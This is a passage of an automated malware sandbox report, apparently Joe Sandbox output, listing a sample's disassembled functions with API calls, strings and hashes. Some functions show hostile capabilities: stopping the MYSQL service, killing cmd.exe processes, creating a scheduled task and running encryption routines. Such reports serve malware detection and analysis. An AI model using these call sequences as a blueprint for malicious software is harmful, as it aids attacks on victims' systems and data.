                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock_wcscmp
                                                                                                        • String ID:
                                                                                                        • API String ID: 1077091919-0
                                                                                                        • Opcode ID: bcd18ef5132995cec8e42d5cb8b494760abfccb2b7238d9a0b788c9c17a35684
                                                                                                        • Instruction ID: 0c5496a13978757359c5b6260b0ff0c859be72b1c8090643f8f5cb349d7334c9
                                                                                                        • Opcode Fuzzy Hash: bcd18ef5132995cec8e42d5cb8b494760abfccb2b7238d9a0b788c9c17a35684
                                                                                                        • Instruction Fuzzy Hash: 7941C432904704AFDB11AFA4DC86B9E77E5AF84734F20402EF51497142DB7EA645EB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F28000 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 344COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: 3fc8d952828bcdc5b433511f9a620a5ecdb2f463a0d5f6ef86fefac60f8f204f
                                                                                                        • Instruction ID: d7bf4ca59df457ff9de56cc0a9956e3a2c1ef74ac485965436c57af47d027377
                                                                                                        • Opcode Fuzzy Hash: 3fc8d952828bcdc5b433511f9a620a5ecdb2f463a0d5f6ef86fefac60f8f204f
                                                                                                        • Instruction Fuzzy Hash: 6CC1B071701215DFDB18CF08EC81A6E77A6EF44794B24892DE891CB381CB30ED56AB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160comstringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32(00000000), ref: 00F1DAEB
                                                                                                        • CoCreateInstance.OLE32(00FE4F6C,00000000,00000001,00FE4F3C,?,?,00FDA948,000000FF), ref: 00F1DB0B
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 00F1DBD6
                                                                                                        • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,00FDA948,000000FF), ref: 00F1DBE3
                                                                                                        • _memset.LIBCMT ref: 00F1DC38
                                                                                                        • CoUninitialize.OLE32 ref: 00F1DC92
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                        • String ID: --Task$Comment$Time Trigger Task
                                                                                                        • API String ID: 330603062-1376107329
                                                                                                        • Opcode ID: 91c5fbc2ae3eac383f05940961f7bc983d35a324924c7defd6dcdb18eb1a90bf
                                                                                                        • Instruction ID: 2a3d67a021bd9c038f1a102111cc0df72660fb74c6058a3e2261f8a81c2ab9b1
                                                                                                        • Opcode Fuzzy Hash: 91c5fbc2ae3eac383f05940961f7bc983d35a324924c7defd6dcdb18eb1a90bf
                                                                                                        • Instruction Fuzzy Hash: C2512370A4024AAFCB00DF94CC89FAE77B9FF88B05F108558F505AB290DBB5A945CF91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F21A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63servicesleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00F21A1D
                                                                                                        • OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00F21A32
                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 00F21A46
                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00F21A5B
                                                                                                        • Sleep.KERNEL32(?), ref: 00F21A75
                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00F21A80
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00F21A9E
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00F21AA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
                                                                                                        • String ID: MYSQL
                                                                                                        • API String ID: 2359367111-1651825290
                                                                                                        • Opcode ID: 9f27b672c6d181d0f8dadcacaea404517138a15070b0b70f1f7089d5189e4ea5
                                                                                                        • Instruction ID: 296adc52c1f3977133143141c60b69fc08ffe2f58aadd0bf8e7576d3914ed272
                                                                                                        • Opcode Fuzzy Hash: 9f27b672c6d181d0f8dadcacaea404517138a15070b0b70f1f7089d5189e4ea5
                                                                                                        • Instruction Fuzzy Hash: AB11A331E0221AABDB205BA4AC4DFAF7BBDEB45761F040111FA00E6140D728D945EEE4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F5F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • std::exception::exception.LIBCMT ref: 00F5F27F
                                                                                                          • Part of subcall function 00F40CFC: std::exception::_Copy_str.LIBCMT ref: 00F40D15
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F5F294
                                                                                                          • Part of subcall function 00F40ECA: RaiseException.KERNEL32(?,?,00F5F299,?,?,?,?,?,?,?,00F5F299,?,01018238,?), ref: 00F40F1F
                                                                                                        • std::exception::exception.LIBCMT ref: 00F5F2AD
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F5F2C2
                                                                                                        • std::regex_error::regex_error.LIBCPMT ref: 00F5F2D4
                                                                                                          • Part of subcall function 00F5EF74: std::exception::exception.LIBCMT ref: 00F5EF8E
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F5F2E2
                                                                                                        • std::exception::exception.LIBCMT ref: 00F5F2FB
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00F5F310
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                        • String ID: bad function call
                                                                                                        • API String ID: 2464034642-3612616537
                                                                                                        • Opcode ID: 19c60c2fe2ccb3d86236ff627f883da013f9870a61f408537e6395f6b0b9618e
                                                                                                        • Instruction ID: 9a099d38b344b3b62c2b57f211a8aba58068a6a026cd89a340a61fa55a37eec2
                                                                                                        • Opcode Fuzzy Hash: 19c60c2fe2ccb3d86236ff627f883da013f9870a61f408537e6395f6b0b9618e
                                                                                                        • Instruction Fuzzy Hash: E211EC74D0020DBBCF00EFA5C985CDDBBBCEA04344B448566BE2497546EB78A3199B91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F75480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 00F754C8
                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00F754D4
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 00F754F7
                                                                                                        • GetLastError.KERNEL32(?,?,00000000), ref: 00F75503
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00F75531
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 00F7555B
                                                                                                        • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 00F755F5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                        • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                        • API String ID: 1717984340-2085858615
                                                                                                        • Opcode ID: 45622226a1e0b92227e80248a9b9e6615fd8719d5f76040eaafb4a6869e4458d
                                                                                                        • Instruction ID: 22b2f07c215128af157ef7dd4bfa2f0f1ba972c4860f84bb43b63572117e5cb7
                                                                                                        • Opcode Fuzzy Hash: 45622226a1e0b92227e80248a9b9e6615fd8719d5f76040eaafb4a6869e4458d
                                                                                                        • Instruction Fuzzy Hash: 2C514B31E40609BBEB206B648C03FBF776AAF45B20F044167FE05AB1D1D6A59D05A6A3
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F22440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00F2244F
                                                                                                        • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00F22469
                                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F224A1
                                                                                                        • TerminateProcess.KERNEL32(00000000,00000009), ref: 00F224B0
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F224B7
                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 00F224C1
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F224CD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                        • String ID: cmd.exe
                                                                                                        • API String ID: 2696918072-723907552
                                                                                                        • Opcode ID: a8fbbbba391fa7b13fc375e75416df0fcbe96c0f1d4cbe7dd33310b516673ad6
                                                                                                        • Instruction ID: 74b34f0a560826bd86cc79d57ea010983a12cc4df81550bf31f7137bc438e688
                                                                                                        • Opcode Fuzzy Hash: a8fbbbba391fa7b13fc375e75416df0fcbe96c0f1d4cbe7dd33310b516673ad6
                                                                                                        • Instruction Fuzzy Hash: D401963290222A7BD720A7B1BC4DFAF776CDB04715F000152FD08D2142E66499409AE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _malloc$__except_handler4_fprintf
                                                                                                        • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                        • API String ID: 1783060780-3771355929
                                                                                                        • Opcode ID: 27b5574b9f50ceb892d1dba0f1708779190e604ee8648416b4634dc67b7b7286
                                                                                                        • Instruction ID: f0366f06331f9dff8882d69f5133db8001bd98740f2888ecc004903134478cd6
                                                                                                        • Opcode Fuzzy Hash: 27b5574b9f50ceb892d1dba0f1708779190e604ee8648416b4634dc67b7b7286
                                                                                                        • Instruction Fuzzy Hash: 03A142B1C00259DBEF11EFE4DC56BDEBB75AF14314F140028E40577282D7BA5A98EBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F73350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _strncmp
                                                                                                        • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                        • API String ID: 909875538-2908105608
                                                                                                        • Opcode ID: e65d30b4e54d7de6c00591f13d43ac5195f91982d55b8f12e6dba2d4df3bb017
                                                                                                        • Instruction ID: 0de97af402abe0aec42b1a24db2f4819ed682db507e99e263b75940bc0ef9c67
                                                                                                        • Opcode Fuzzy Hash: e65d30b4e54d7de6c00591f13d43ac5195f91982d55b8f12e6dba2d4df3bb017
                                                                                                        • Instruction Fuzzy Hash: 264148A1F8835579F731A929BC03F9673815F51B21F088422FB8CE91C2F7858547B293
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F35141 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __init_pointers.LIBCMT ref: 00F35141
                                                                                                          • Part of subcall function 00F37D6C: EncodePointer.KERNEL32(00000000,?,00F35146,00F33FFE,01017990,00000014), ref: 00F37D6F
                                                                                                          • Part of subcall function 00F37D6C: __initp_misc_winsig.LIBCMT ref: 00F37D8A
                                                                                                          • Part of subcall function 00F37D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F426B3
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00F426C7
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00F426DA
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00F426ED
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00F42700
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00F42713
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00F42726
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00F42739
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00F4274C
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00F4275F
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00F42772
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00F42785
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00F42798
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00F427AB
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00F427BE
                                                                                                          • Part of subcall function 00F37D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00F427D1
                                                                                                        • __mtinitlocks.LIBCMT ref: 00F35146
                                                                                                        • __mtterm.LIBCMT ref: 00F3514F
                                                                                                          • Part of subcall function 00F351B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00F35154,00F33FFE,01017990,00000014), ref: 00F38B62
                                                                                                          • Part of subcall function 00F351B7: _free.LIBCMT ref: 00F38B69
                                                                                                          • Part of subcall function 00F351B7: DeleteCriticalSection.KERNEL32(0101AC00,?,?,00F35154,00F33FFE,01017990,00000014), ref: 00F38B8B
                                                                                                        • __calloc_crt.LIBCMT ref: 00F35174
                                                                                                        • __initptd.LIBCMT ref: 00F35196
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F3519D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 3567560977-0
                                                                                                        • Opcode ID: b4186c6fedaa2b3c0fef3554ba354e997b58c664b0879b02535a623dc11e98e2
                                                                                                        • Instruction ID: f679d2c69902e0ebd839cf369d566a671e782742f7fa2ab4ee7eef1b5a4114d0
                                                                                                        • Opcode Fuzzy Hash: b4186c6fedaa2b3c0fef3554ba354e997b58c664b0879b02535a623dc11e98e2
                                                                                                        • Instruction Fuzzy Hash: 40F0243394AB515DE23577B47D03B4A3AD0EF41B70F21062AF864C62D5FF2D94427190
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F353AE Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __lock.LIBCMT ref: 00F3594A
                                                                                                          • Part of subcall function 00F38AF7: __mtinitlocknum.LIBCMT ref: 00F38B09
                                                                                                          • Part of subcall function 00F38AF7: __amsg_exit.LIBCMT ref: 00F38B15
                                                                                                          • Part of subcall function 00F38AF7: EnterCriticalSection.KERNEL32(00000000,?,00F350D7,0000000D), ref: 00F38B22
                                                                                                        • _free.LIBCMT ref: 00F35970
                                                                                                          • Part of subcall function 00F30BED: RtlFreeHeap.NTDLL(00000000,00000000,?,00F3507F,00000000,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30C01
                                                                                                          • Part of subcall function 00F30BED: GetLastError.KERNEL32(00000000,?,00F3507F,00000000,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30C13
                                                                                                        • __lock.LIBCMT ref: 00F35989
                                                                                                        • ___removelocaleref.LIBCMT ref: 00F35998
                                                                                                        • ___freetlocinfo.LIBCMT ref: 00F359B1
                                                                                                        • _free.LIBCMT ref: 00F359C4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
